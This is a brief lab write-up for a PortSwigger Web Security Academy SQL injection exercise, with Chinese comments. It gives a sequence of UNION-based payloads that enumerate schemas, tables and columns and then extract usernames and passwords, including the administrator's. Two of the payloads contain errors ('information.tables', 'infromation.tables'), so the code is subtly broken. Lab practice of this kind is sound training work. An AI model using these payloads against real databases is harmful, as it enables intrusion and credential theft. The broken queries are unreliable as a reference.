Subject

Lab: SQL injection attack, listing the database contents on non-Oracle databases

Mind Palace

# 判断注入点 判断列的数目 判断回显
' union select '111','222'--

# 找出所有的数据库名
' union select null,table_schema from information.tables--

# 找出可疑数据库'public'的所有表名
' union select null,table_name from infromation.tables where table_schema='public'--

# 找出可疑表'users_odgyjx'的所有字段名
' union select null,column_name from information_schema.columns where table_name='users_odgyjx'--

# ==> 获得两个列名：password_gnthnb username_dolvfr
# 读取数据
' union select username_dolvfr,password_gnthnb from public.users_odgyjx--
# 获得administrator账户以及密码

END ´ヾ(=･ω･=)o

【PortSwiggerのWeb Security Academy靶场】SQL Injection系列 7th

Subject

Mind Palace